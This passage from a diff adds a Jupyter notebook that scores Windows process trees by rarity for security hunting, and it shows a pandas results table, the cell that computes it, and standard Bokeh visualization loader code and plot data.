+       "      <td>2</td>\n",
+       "      <td>0.000178</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>6</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.000178</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>30</th>\n",
+       "      <td>30</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.000178</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "    Row                                        RootProcess  TreeSize:  \\\n",
+       "27   27                    C:\\Windows\\System32\\svchost.exe          4   \n",
+       "23   23                    C:\\Windows\\System32\\svchost.exe          2   \n",
+       "22   22                       C:\\Windows\\System32\\smss.exe         30   \n",
+       "20   20  C:\\Windows\\SoftwareDistribution\\Download\\Insta...          2   \n",
+       "9     9                       C:\\Windows\\System32\\smss.exe          7   \n",
+       "7     7  C:\\ProgramData\\Microsoft\\Windows Defender\\plat...         46   \n",
+       "10   10                   C:\\Windows\\System32\\winlogon.exe          2   \n",
+       "5     5                    C:\\Windows\\System32\\svchost.exe         21   \n",
+       "18   18  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...          3   \n",
+       "13   13  C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.3031...          2   \n",
+       "29   29  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...          4   \n",
+       "25   25  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...          4   \n",
+       "21   21  C:\\ProgramData\\Microsoft\\Windows Defender\\plat...         21   \n",
+       "16   16                   C:\\Windows\\System32\\services.exe        320   \n",
+       "15   15                    C:\\Windows\\System32\\svchost.exe       1381   \n",
+       "2     2                    C:\\Windows\\System32\\svchost.exe       2192   \n",
+       "4     4                   C:\\Windows\\System32\\services.exe        105   \n",
+       "3     3                    C:\\Windows\\System32\\svchost.exe        689   \n",
+       "0     0  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...         13   \n",
+       "11   11                                            unknown       8936   \n",
+       "1     1  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...        259   \n",
+       "19   19                    C:\\Windows\\System32\\svchost.exe       4949   \n",
+       "17   17  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...         11   \n",
+       "14   14  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...        274   \n",
+       "8     8  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...       3703   \n",
+       "12   12  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...          2   \n",
+       "24   24  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...          2   \n",
+       "26   26  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...          2   \n",
+       "28   28  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...          2   \n",
+       "6     6  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...          2   \n",
+       "30   30  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...          2   \n",
+       "\n",
+       "    AverageRarity  \n",
+       "27       0.666726  \n",
+       "23       0.500000  \n",
+       "22       0.398288  \n",
+       "20       0.333333  \n",
+       "9        0.250000  \n",
+       "7        0.190123  \n",
+       "10       0.166667  \n",
+       "5        0.146667  \n",
+       "18       0.125089  \n",
+       "13       0.125000  \n",
+       "29       0.095297  \n",
+       "25       0.095297  \n",
+       "21       0.059754  \n",
+       "16       0.056118  \n",
+       "15       0.038497  \n",
+       "2        0.025462  \n",
+       "4        0.025112  \n",
+       "3        0.019825  \n",
+       "0        0.012703  \n",
+       "11       0.011424  \n",
+       "1        0.007365  \n",
+       "19       0.007174  \n",
+       "17       0.007138  \n",
+       "14       0.003676  \n",
+       "8        0.000194  \n",
+       "12       0.000178  \n",
+       "24       0.000178  \n",
+       "26       0.000178  \n",
+       "28       0.000178  \n",
+       "6        0.000178  \n",
+       "30       0.000178  "
+      ]
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "prar_roots = ptree.get_roots(proc_rarity_tree)\n",
+    "\n",
+    "# Find the tree with the highest Rarity Score\n",
+    "tree_rarity = []\n",
+    "for row_num, (ix, row) in enumerate(prar_roots.iterrows()):\n",
+    "    rarity_tree = ptree.get_descendents(proc_rarity_tree, row)\n",
+    "    tree_rarity.append({\n",
+    "        \"Row\": row_num,\n",
+    "        \"RootProcess\": prar_roots.loc[ix].NewProcessName,\n",
+    "        \"TreeSize:\": len(rarity_tree),\n",
+    "        \"AverageRarity\": rarity_tree[\"Rarity\"].mean()\n",
+    "    })\n",
+    "    \n",
+    "pd.DataFrame(tree_rarity).sort_values(\"AverageRarity\", ascending=False)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:46.965995Z",
+     "start_time": "2020-08-25T15:53:46.778997Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1594\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  const force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  const JS_MIME_TYPE = 'application/javascript';\n  const HTML_MIME_TYPE = 'text/html';\n  const EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  const CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    const script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    const cell = handle.cell;\n\n    const id = cell.output_area._bokeh_element_id;\n    const server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      const cmd_clean = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd_clean, {\n        iopub: {\n          output: function(msg) {\n            const id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      const cmd_destroy = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd_destroy);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    const output_area = handle.output_area;\n    const output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    const toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      const bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      const script_attrs = bk_div.children[0].attributes;\n      for (let i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      const toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      const props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    const events = require('base/js/events');\n    const OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  const NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    const el = document.getElementById(\"1594\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  const js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-mathjax-2.4.2.min.js\"];\n  const css_urls = [];\n  \n\n  const inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (let i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      const cell = $(document.getElementById(\"1594\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"3037c35d-8d35-4f2f-8503-02ea6630ad3a\" data-root-id=\"1723\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  const docs_json = {\"e6b7ba57-61a3-430c-a452-62fd60212899\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1706\"},{\"id\":\"1720\"}]},\"id\":\"1723\",\"type\":\"Column\"},{\"attributes\":{},\"id\":\"1668\",\"type\":\"LinearScale\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1694\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1754\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1707\",\"type\":\"DateFormatter\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"1760\"},\"group\":null,\"major_label_policy\":{\"id\":\"1761\"},\"ticker\":{\"id\":\"1673\"},\"visible\":false},\"id\":\"1672\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1760\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"color_mapper\":{\"id\":\"1596\"},\"coordinates\":null,\"group\":null,\"location\":[0,0],\"major_label_policy\":{\"id\":\"1753\"},\"width\":8},\"id\":\"1597\",\"type\":\"ColorBar\"},{\"attributes\":{},\"id\":\"1684\",\"type\":\"ResetTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1596\"}},\"hatch_alpha\":{\"value\":0.1},\"height\":{\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1694\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1697\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1677\",\"type\":\"BasicTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1702\"},\"x_range\":null,\"y_range\":{\"id\":\"1603\"}},\"id\":\"1701\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"1681\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1753\",\"type\":\"NoOverlap\"},{\"attributes\":{},\"id\":\"1680\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1755\",\"type\":\"AllLabels\"},{\"attributes\":{\"range\":{\"id\":\"1601\"},\"value\":0.1},\"id\":\"1635\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1761\",\"type\":\"AllLabels\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1595\"},\"glyph\":{\"id\":\"1696\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1698\"},\"nonselection_glyph\":{\"id\":\"1697\"},\"view\":{\"id\":\"1700\"}},\"id\":\"1699\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"editor\":{\"id\":\"1731\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1730\"},\"title\":\"SubjectUserSid\"},\"id\":\"1711\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1729\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1728\"},\"title\":\"SubjectUserName\"},\"id\":\"1710\",\"type\":\"TableColumn\"},{\"attributes\":{\"coordinates\":null,\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"group\":null,\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"1702\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"overlay\":{\"id\":\"1686\"}},\"id\":\"1682\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"children\":[{\"id\":\"1598\"},{\"id\":\"1663\"}]},\"id\":\"1706\",\"type\":\"Row\"},{\"attributes\":{\"source\":{\"id\":\"1595\"}},\"id\":\"1634\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1752\",\"type\":\"AllLabels\"},{\"attributes\":{\"high\":1.0,\"low\":0.05263157894736842,\"palette\":[\"#440154\",\"#440255\",\"#440357\",\"#450558\",\"#45065A\",\"#45085B\",\"#46095C\",\"#460B5E\",\"#460C5F\",\"#460E61\",\"#470F62\",\"#471163\",\"#471265\",\"#471466\",\"#471567\",\"#471669\",\"#47186A\",\"#48196B\",\"#481A6C\",\"#481C6E\",\"#481D6F\",\"#481E70\",\"#482071\",\"#482172\",\"#482273\",\"#482374\",\"#472575\",\"#472676\",\"#472777\",\"#472878\",\"#472A79\",\"#472B7A\",\"#472C7B\",\"#462D7C\",\"#462F7C\",\"#46307D\",\"#46317E\",\"#45327F\",\"#45347F\",\"#453580\",\"#453681\",\"#443781\",\"#443982\",\"#433A83\",\"#433B83\",\"#433C84\",\"#423D84\",\"#423E85\",\"#424085\",\"#414186\",\"#414286\",\"#404387\",\"#404487\",\"#3F4587\",\"#3F4788\",\"#3E4888\",\"#3E4989\",\"#3D4A89\",\"#3D4B89\",\"#3D4C89\",\"#3C4D8A\",\"#3C4E8A\",\"#3B508A\",\"#3B518A\",\"#3A528B\",\"#3A538B\",\"#39548B\",\"#39558B\",\"#38568B\",\"#38578C\",\"#37588C\",\"#37598C\",\"#365A8C\",\"#365B8C\",\"#355C8C\",\"#355D8C\",\"#345E8D\",\"#345F8D\",\"#33608D\",\"#33618D\",\"#32628D\",\"#32638D\",\"#31648D\",\"#31658D\",\"#31668D\",\"#30678D\",\"#30688D\",\"#2F698D\",\"#2F6A8D\",\"#2E6B8E\",\"#2E6C8E\",\"#2E6D8E\",\"#2D6E8E\",\"#2D6F8E\",\"#2C708E\",\"#2C718E\",\"#2C728E\",\"#2B738E\",\"#2B748E\",\"#2A758E\",\"#2A768E\",\"#2A778E\",\"#29788E\",\"#29798E\",\"#287A8E\",\"#287A8E\",\"#287B8E\",\"#277C8E\",\"#277D8E\",\"#277E8E\",\"#267F8E\",\"#26808E\",\"#26818E\",\"#25828E\",\"#25838D\",\"#24848D\",\"#24858D\",\"#24868D\",\"#23878D\",\"#23888D\",\"#23898D\",\"#22898D\",\"#228A8D\",\"#228B8D\",\"#218C8D\",\"#218D8C\",\"#218E8C\",\"#208F8C\",\"#20908C\",\"#20918C\",\"#1F928C\",\"#1F938B\",\"#1F948B\",\"#1F958B\",\"#1F968B\",\"#1E978A\",\"#1E988A\",\"#1E998A\",\"#1E998A\",\"#1E9A89\",\"#1E9B89\",\"#1E9C89\",\"#1E9D88\",\"#1E9E88\",\"#1E9F88\",\"#1EA087\",\"#1FA187\",\"#1FA286\",\"#1FA386\",\"#20A485\",\"#20A585\",\"#21A685\",\"#21A784\",\"#22A784\",\"#23A883\",\"#23A982\",\"#24AA82\",\"#25AB81\",\"#26AC81\",\"#27AD80\",\"#28AE7F\",\"#29AF7F\",\"#2AB07E\",\"#2BB17D\",\"#2CB17D\",\"#2EB27C\",\"#2FB37B\",\"#30B47A\",\"#32B57A\",\"#33B679\",\"#35B778\",\"#36B877\",\"#38B976\",\"#39B976\",\"#3BBA75\",\"#3DBB74\",\"#3EBC73\",\"#40BD72\",\"#42BE71\",\"#44BE70\",\"#45BF6F\",\"#47C06E\",\"#49C16D\",\"#4BC26C\",\"#4DC26B\",\"#4FC369\",\"#51C468\",\"#53C567\",\"#55C666\",\"#57C665\",\"#59C764\",\"#5BC862\",\"#5EC961\",\"#60C960\",\"#62CA5F\",\"#64CB5D\",\"#67CC5C\",\"#69CC5B\",\"#6BCD59\",\"#6DCE58\",\"#70CE56\",\"#72CF55\",\"#74D054\",\"#77D052\",\"#79D151\",\"#7CD24F\",\"#7ED24E\",\"#81D34C\",\"#83D34B\",\"#86D449\",\"#88D547\",\"#8BD546\",\"#8DD644\",\"#90D643\",\"#92D741\",\"#95D73F\",\"#97D83E\",\"#9AD83C\",\"#9DD93A\",\"#9FD938\",\"#A2DA37\",\"#A5DA35\",\"#A7DB33\",\"#AADB32\",\"#ADDC30\",\"#AFDC2E\",\"#B2DD2C\",\"#B5DD2B\",\"#B7DD29\",\"#BADE27\",\"#BDDE26\",\"#BFDF24\",\"#C2DF22\",\"#C5DF21\",\"#C7E01F\",\"#CAE01E\",\"#CDE01D\",\"#CFE11C\",\"#D2E11B\",\"#D4E11A\",\"#D7E219\",\"#DAE218\",\"#DCE218\",\"#DFE318\",\"#E1E318\",\"#E4E318\",\"#E7E419\",\"#E9E419\",\"#ECE41A\",\"#EEE51B\",\"#F1E51C\",\"#F3E51E\",\"#F6E61F\",\"#F8E621\",\"#FAE622\",\"#FDE724\"]},\"id\":\"1596\",\"type\":\"LinearColorMapper\"},{\"attributes\":{},\"id\":\"1683\",\"type\":\"SaveTool\"},{\"attributes\":{\"range\":{\"id\":\"1603\"},\"value\":-0.2},\"id\":\"1636\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1635\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1636\"}}},\"id\":\"1639\",\"type\":\"Text\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1596\"}},\"hatch_alpha\":{\"value\":0.2},\"height\":{\"value\":0.8},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1694\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1698\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1757\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1673\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1670\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1751\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1685\",\"type\":\"HelpTool\"},{\"attributes\":{\"editor\":{\"id\":\"1727\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1707\"},\"title\":\"TimeGenerated\"},\"id\":\"1708\",\"type\":\"TableColumn\"},{\"attributes\":{\"axis\":{\"id\":\"1676\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"1679\",\"type\":\"Grid\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"Rarity\",\"transform\":{\"id\":\"1596\"}},\"height\":{\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1694\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1696\",\"type\":\"Rect\"},{\"attributes\":{\"source\":{\"id\":\"1595\"}},\"id\":\"1700\",\"type\":\"CDSView\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"1757\"},\"group\":null,\"major_label_policy\":{\"id\":\"1758\"},\"ticker\":{\"id\":\"1677\"},\"visible\":false},\"id\":\"1676\",\"type\":\"LinearAxis\"},{\"attributes\":{\"active_multi\":{\"id\":\"1701\"},\"tools\":[{\"id\":\"1680\"},{\"id\":\"1681\"},{\"id\":\"1682\"},{\"id\":\"1683\"},{\"id\":\"1684\"},{\"id\":\"1685\"},{\"id\":\"1701\"}]},\"id\":\"1687\",\"type\":\"Toolbar\"},{\"attributes\":{\"bottom_units\":\"screen\",\"coordinates\":null,\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"group\":null,\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1686\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1758\",\"type\":\"AllLabels\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1635\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1636\"}}},\"id\":\"1638\",\"type\":\"Text\"},{\"attributes\":{\"below\":[{\"id\":\"1609\"}],\"center\":[{\"id\":\"1612\"},{\"id\":\"1616\"}],\"height\":700,\"left\":[{\"id\":\"1613\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"1633\"},{\"id\":\"1641\"},{\"id\":\"1649\"},{\"id\":\"1657\"}],\"right\":[{\"id\":\"1597\"}],\"title\":{\"id\":\"1599\"},\"toolbar\":{\"id\":\"1621\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"1601\"},\"x_scale\":{\"id\":\"1605\"},\"y_range\":{\"id\":\"1603\"},\"y_scale\":{\"id\":\"1607\"}},\"id\":\"1598\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"axis\":{\"id\":\"1672\"},\"coordinates\":null,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"1675\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1732\",\"type\":\"StringFormatter\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1651\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1652\"}}},\"id\":\"1656\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1618\",\"type\":\"SaveTool\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1643\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1644\"}}},\"id\":\"1646\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1736\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1595\"}},\"id\":\"1642\",\"type\":\"CDSView\"},{\"attributes\":{\"end\":31,\"start\":10},\"id\":\"1603\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1742\",\"type\":\"StringFormatter\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1651\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"